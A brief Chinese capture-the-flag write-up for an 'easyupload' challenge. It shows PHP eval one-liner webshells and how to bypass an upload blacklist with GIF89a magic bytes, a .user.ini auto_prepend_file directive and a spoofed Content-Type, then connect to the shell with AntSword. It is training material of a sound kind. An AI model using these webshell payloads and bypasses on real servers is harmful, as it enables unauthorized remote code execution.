CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
网云工程师手记7 小时前
DDNS-Go部署与使用体验:动态公网IP远程访问不再断
运维·服务器·网络·网络协议·网络安全
中科三方8 小时前
域名注册后无法解析解决方法:技术故障排查和解决指南
开发语言·github·php
unable code9 小时前
内存取证-easy_mem_1
网络安全·ctf·misc·1024程序员节·内存取证
米羊12110 小时前
风险评估文档记录
开发语言·网络·php
切糕师学AI11 小时前
NFS(网络文件系统)详解
开发语言·网络·php
网云工程师手记14 小时前
防火墙接口配置与运维实战(通用版)
运维·服务器·网络·网络协议·网络安全
VXbishe14 小时前
基于web的校园失物招领管理系统-计算机毕设 附源码 24150
javascript·vue.js·spring boot·python·node.js·php·html5
云游云记17 小时前
php CRM客户分配方案整理
php·crm
枷锁—sha17 小时前
【SRC】前后端分离与API接口渗透
服务器·网络·安全·网络安全·系统安全
追夢秋陽17 小时前
MacOS 通过Shell 脚本一步到位配置nginx+Php环境
nginx·macos·php·一站式配置